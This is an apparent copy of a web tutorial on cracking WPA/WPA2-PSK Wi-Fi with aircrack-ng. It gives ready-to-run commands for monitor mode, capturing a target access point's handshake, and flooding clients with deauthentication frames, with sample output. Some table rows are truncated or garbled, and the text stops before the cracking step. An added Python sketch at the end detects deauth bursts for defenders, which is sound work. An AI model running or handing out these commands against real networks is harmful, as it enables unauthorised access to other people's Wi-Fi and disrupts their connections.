Crack Wi-Fi With WPA_WPA2-PSK Using Aircrack-ng
8/12/2019 Crack Wi-Fi With WPA_WPA2-PSK Using Aircrack-ng
Crack Wi-Fi with WPA/WPA2-PSK using Aircrack-ng
This article is a summary of effective commands that just work.
With the help of these commands you will be able to crack WPA/WPA2 Wi-Fi access points which use PSK (Pre-Shared Key) encryption.
The objective is to capture the WPA/WPA2 authentication handshake and then crack the PSK using aircrack-ng.
The full tutorial about WPA/WPA2 cracking can be found here.
Here are the basic steps we will be going through:
0. Install the latest aircrack-ng
1. Start the wireless interface in monitor mode using airmon-ng
2. Start airodump-ng on AP channel with filter for BSSID to collect authentication handshake
3. [Optional] Use aireplay-ng to deauthenticate the wireless client
4. Run aircrack-ng to crack the WPA/WPA2-PSK using the authentication handshake
0. Install the Latest Aircrack-ng
Install the required dependencies:
$ sudo apt-get install build-essential libssl-dev pkg-config
Download and install the latest aircrack-ng:
$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-beta3.tar.gz
$ tar -xzf aircrack-ng-1.2-beta3.tar.gz
$ cd aircrack-ng-1.2-beta3
$ sudo make
$ sudo make install
Be sure to check that the version of aircrack-ng is up-to-date because you may see problems with older versions.
$ aircrack-ng --help | head -3
Aircrack-ng 1.2 beta3 r2393 - (C) 2006-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
http://www.aircrack-ng.org/doku.php?id=cracking_wpa
http://www.aircrack-ng.org/doku.php?id=install_aircrack
1. Start the Wireless Interface in Monitor Mode
Find and stop all processes that could cause trouble:
$ sudo airmon-ng check kill
Start the wireless interface in monitor mode:
$ sudo airmon-ng start wlan0
Notice that airmon-ng enabled monitor-mode on mon0:

Interface   Chipset      Driver
wlan0       Intel 6235   iwlwifi - [phy0]
            (monitor mode enabled on mon0)

So, the correct interface name to use in later parts of the tutorial is mon0.
2. Start Airodump-ng to Collect Authentication Handshake
Now, when our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air.
It can be done with airodump-ng command:
$ sudo airodump-ng mon0
All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen:

CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46

BSSID              PWR  Beacons  #Data  #/s  CH  MB   ENC   CIPHER  AUTH  ESSID
00:11:22:33:44:55  -48      212   1536   66   1  54e  WPA2  CCMP    PSK   CrackMe
66:77:88:99:00:11  -64      134    345   34   1  54e  WPA2  CCMP    PSK   SomeAP

BSSID              STATION            PWR  Rate   Lost  Frames  Probe
00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44  0 - 1   114      56
00:11:22:33:44:55  GG:HH:II:JJ:KK:LL  -78  0 - 1     0       1
66:77:88:99:00:11  MM:
Now start airodump-ng on AP channel with filter for BSSID to collect authentication handshake for the access point we are interested in:
$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one

Option                  Description
-c                      The channel for the wireless network
--bssid                 The MAC address of the access point
-w                      The file name prefix for the file which will contain authentication handshake
mon0                    The wireless interface
--ignore-negative-one   Removes 'fi

if you want to force this process.
After some time you'll notice the WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the screen.
This means airodump-ng has successfully captured the handshake.

CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46  WPA handshake: 00:11:22:33:44:55

BSSID              PWR  Beacons  #Data  #/s  CH  MB   ENC   CIPHER  AUTH  ESSID
00:11:22:33:44:55  -48      212   1536   66   1  54e  WPA2  CCMP    PSK   CrackMe

BSSID              STATION            PWR  Rate   Lost  Frames  Probe
00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44  0 - 1   114      56
3. [Optional] Use Aireplay-ng to Deauthenticate the Wireless Client
This step is optional. If you can't wait till airodump-ng captures a handshake, you can send a message to the wireless client saying that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP and we'll capture the authentication handshake.
Send DeAuth to broadcast:
$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one
Send directed DeAuth (attack is more effective when it is targeted):
$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one

Option                  Description
--deauth 100            The number of de-authenticate frames you want to send (0 for unlimited)
-a                      The MAC address of the access point
-c                      The MAC address of the client
mon0                    The wireless interface
--ignore-negative-one   Removes 'fi
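
For the defender's side of step 3, a sketch (added here, not part of the original tutorial) that flags the frame pattern the aireplay-ng commands above produce: a dense run of deauthentication frames for one BSSID, followed by a fresh EAPOL handshake. The frame tuples, addresses and thresholds are constructed assumptions; in practice the records would come from a monitor-mode sensor or a WIDS export.

```python
from collections import defaultdict, deque

BROADCAST = "FF:FF:FF:FF:FF:FF"
AP, STA = "02:00:00:00:00:AA", "02:00:00:00:00:01"   # constructed addresses

def sample_frames():
    """Constructed capture summary: (seconds, kind, BSSID, client MAC)."""
    frames = [(1.0, "deauth", AP, STA)]                                   # one ordinary disconnect
    frames += [(30.0 + i * 0.02, "deauth", AP, STA) for i in range(100)]  # dense burst
    frames += [(33.0 + i * 0.01, "eapol", AP, STA) for i in range(4)]     # client re-authenticates
    return frames

def detect_deauth_bursts(frames, threshold=20, window=1.0, followup=10.0):
    """Alert once per (BSSID, client) that receives >= threshold deauth frames
    inside `window` seconds, and note whether an EAPOL handshake follows."""
    recent = defaultdict(deque)   # (bssid, client) -> deauth timestamps in window
    alerts = {}
    for ts, kind, bssid, client in sorted(frames):
        key = (bssid, client)
        if kind == "deauth":
            q = recent[key]
            q.append(ts)
            while ts - q[0] > window:      # drop timestamps older than the window
                q.popleft()
            if len(q) >= threshold and key not in alerts:
                alerts[key] = {"bssid": bssid,
                               "target": "broadcast" if client == BROADCAST else client,
                               "first_seen": q[0], "handshake_followed": False}
            if key in alerts:
                alerts[key]["last_seen"] = ts
        elif kind == "eapol":
            # A handshake shortly after a burst on the same AP is the capture
            # opportunity the tutorial describes, so record it on the alert.
            for alert in alerts.values():
                same_ap = alert["bssid"] == bssid
                affected = alert["target"] in ("broadcast", client)
                if same_ap and affected and 0 <= ts - alert["last_seen"] <= followup:
                    alert["handshake_followed"] = True
    return list(alerts.values())

if __name__ == "__main__":
    for alert in detect_deauth_bursts(sample_frames()):
        print(alert)
```

Enabling 802.11w Protected Management Frames on the AP and clients makes clients discard unauthenticated deauth frames, which removes the forced re-authentication this detector looks for.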